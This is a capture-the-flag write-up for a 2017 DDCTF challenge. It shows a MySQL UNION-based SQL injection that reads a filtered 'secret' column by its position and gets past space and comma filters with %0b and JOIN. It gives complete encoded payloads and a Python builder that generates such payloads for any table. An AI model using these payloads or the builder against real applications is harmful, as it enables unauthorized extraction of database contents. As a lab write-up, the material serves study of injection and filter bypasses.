2017-DDCTF-SQL注入之过滤列名get数据

First, the MySQL behaviour the bypass relies on. (select 1)a is a one-row derived table whose only column is named 1. A UNION takes its column names from the first SELECT, so unioning the dummy row (select 1)a,(select 2)b,(select 3)c with the user table yields a result whose columns are named 1, 2, 3, and an outer query can address the third column as e.3 without ever writing the word password:

mysql> select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from user;
+---+--------+----------+
| 1 | 2      | 3        |
+---+--------+----------+
| 1 | 2      | 3        |
| 1 | admin  | admin    |
| 2 | me7ell | admin123 |
| 3 | qqq    | qqq      |
+---+--------+----------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e;
+----------+
| 3        |
+----------+
| 3        |
| admin    |
| admin123 |
| qqq      |
+----------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e limit 1 offset 3;
+------+
| 3    |
+------+
| qqq  |
+------+
1 row in set (0.00 sec)

mysql> select * from user where id=1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | admin    |
|  1 | 2        | 3        |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql> select * from user where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from user)e limit 1 offset 3),2,3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
| 1    | admin    | admin    |
| qqq  | 2        | 3        |
+------+----------+----------+
2 rows in set (0.00 sec)

Now the challenge: spaces and commas are filtered.

Spaces have many substitutes, since MySQL 5 treats the bytes 09, 0A, 0B, 0C, 0D, A0 and 20 as whitespace between tokens; the comma between derived tables can be replaced with JOIN, because a JOIN with no ON clause is a cross join, the same thing the comma expresses.

union select * from (select 1)x JOIN (select database())y JOIN (select 3)z JOIN (select 4)w

Testing showed the query has 4 columns. With the spaces substituted, this returns the database name, t1; putting other expressions in the echoed position in the same way gives the table name and the rest of the schema:

table news, with four columns: id, title, content, secret.

But any query containing secret is blocked, so the technique from the MySQL session above is used instead.

In union select * from (select 1)x JOIN (select 2)y JOIN (select 3)z JOIN (select 4)w, the y position is the one the page echoes.

Replacing (select 2)y with (select secret from news)y is blocked,

so (select 2)y is finally replaced with

(select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y

where e.4 is the fourth column (secret), and offset 0 of the union is the dummy row 1,2,3,4, so offset 4 is the fourth row of news. Two caveats: UNION (unlike UNION ALL) drops duplicate rows, and without ORDER BY MySQL guarantees no order, so the offset counts rows in whatever order MySQL returns them; in practice the dummy row comes first and the table rows follow. limit 1 offset 4 is used instead of limit 4,1 so that no extra comma is introduced. The full payload:

union select * from (select 1)x JOIN (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y JOIN (select 3)z JOIN (select 4)w

Encode it: spaces become %0b (vertical tab) and commas become JOIN. Spaces are replaced first so that the whitespace inserted around JOIN is already emitted in encoded form.

# the earlier payload, used to read the database name from the y position
#pay = "union select * from (select 1)a JOIN (select database())b JOIN (select 3)c JOIN (select 4)d"
pay = "union select * from (select 1)x JOIN (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from news)e limit 1 offset 4)y JOIN (select 3)z JOIN (select 4)w"
# space -> %0b, then comma -> JOIN (commas only occur between the dummy-row derived tables)
print(pay.replace(' ', '%0b').replace(',', '%0bJOIN%0b'))
# union%0bselect%0b*%0bfrom%0b(select%0b1)x%0bJOIN%0b(select%0be.4%0bfrom%0b(select%0b*%0bfrom%0b(select%0b1)a%0bJOIN%0b(select%0b2)b%0bJOIN%0b(select%0b3)c%0bJOIN%0b(select%0b4)d%0bunion%0bselect%0b*%0bfrom%0bnews)e%0blimit%0b1%0boffset%0b4)y%0bJOIN%0b(select%0b3)z%0bJOIN%0b(select%0b4)w
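To show the bypass as a repeatable procedure rather than one hand-assembled string, here is an added example, written for this page and not code from the writeup or the challenge, that builds the payload generically: it takes the table, its column count, the position of the wanted column, the row offset and the echoed union column, then applies the two substitutions. The filter it checks against is a constructed model that rejects spaces, commas and the substring secret; that model is an assumption, since the writeup only reports that those were blocked, and the waf_blocks, column_by_position, union_payload and build_payload names are this example's own.

```python
# Added example (not from the original writeup): generic builder for the
# column-name-free extraction payload, plus a toy model of the challenge filter.
import string
from urllib.parse import unquote

# Constructed model of the filter (assumption: the real DDCTF filter is not
# available; the writeup only says spaces, commas and `secret` were rejected).
BLOCKED_SUBSTRINGS = (" ", ",", "secret")

# Alias letters: the writeup uses a,b,c,d inside the dummy row and x,y,z,w for
# the outer derived tables, so both sequences start with those.
INNER_ALIASES = string.ascii_lowercase
OUTER_ALIASES = "xyzwvutsrqponmlkjihgfedcba"


def waf_blocks(raw_payload: str) -> bool:
    """True if the URL-decoded payload contains a filtered substring (case-insensitive)."""
    decoded = unquote(raw_payload).lower()
    return any(bad in decoded for bad in BLOCKED_SUBSTRINGS)


def dummy_row(ncols: int) -> str:
    """(select 1)a,(select 2)b,...: one row whose column *names* are 1..ncols."""
    return ",".join(f"(select {i + 1}){INNER_ALIASES[i]}" for i in range(ncols))


def column_by_position(table: str, ncols: int, col_pos: int, row: int, alias: str = "e") -> str:
    """Subquery reading column number `col_pos` (1-based) of the `row`-th row of
    `table` without naming the column.

    The dummy row comes first in the UNION, so every column is renamed to its
    position and `e.<col_pos>` is a valid reference.  Offset 0 is the dummy row,
    hence `offset row` selects the row-th table row as MySQL returns it (UNION has
    no ordering guarantee and drops duplicate rows).  `limit 1 offset n` is used
    instead of `limit n,1` because the latter needs a comma.
    """
    if not 1 <= col_pos <= ncols:
        raise ValueError("col_pos must be within 1..ncols")
    union = f"select * from {dummy_row(ncols)} union select * from {table}"
    return f"select {alias}.{col_pos} from ({union}){alias} limit 1 offset {row}"


def union_payload(ncols: int, echo_col: int, expr: str) -> str:
    """union select * from (select 1)x JOIN (expr)y JOIN ...: `expr` sits in the
    column the page echoes, the other columns are filler constants."""
    parts = []
    for i in range(ncols):
        body = expr if i + 1 == echo_col else f"select {i + 1}"
        parts.append(f"({body}){OUTER_ALIASES[i]}")
    return "union select * from " + " JOIN ".join(parts)


def encode(payload: str) -> str:
    """The writeup's substitutions: space -> %0b (vertical tab, whitespace to
    MySQL) and comma -> JOIN (a cross join, same as the comma between derived
    tables).  Spaces go first so the whitespace around JOIN is already encoded."""
    return payload.replace(" ", "%0b").replace(",", "%0bJOIN%0b")


def build_payload(table: str, ncols: int, col_pos: int, row: int, echo_col: int) -> str:
    """Encoded payload that reads one cell by position, ready for the injection point."""
    return encode(union_payload(ncols, echo_col, column_by_position(table, ncols, col_pos, row)))


if __name__ == "__main__":
    # The writeup's case: news has 4 columns, secret is the 4th, the page echoes
    # the 2nd union column, and the flag is in the 4th row.
    naive = encode(union_payload(4, 2, "select secret from news"))
    print("naive payload blocked:", waf_blocks(naive))   # True, it names the column
    final = build_payload("news", 4, 4, 4, echo_col=2)
    print("final payload blocked:", waf_blocks(final))   # False
    print(final)
```

Because the column count, position and row are parameters, the same builder walks every cell of a table whose column names are all filtered, and the encode step can be swapped for any of the other whitespace bytes listed above if %0b is ever blocked.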

This returns the flag:

flag{DDCTF-******@didichuxing.com}

Reference: Mysql巧妙绕过未知字段名的技巧 (a MySQL trick for bypassing unknown column names)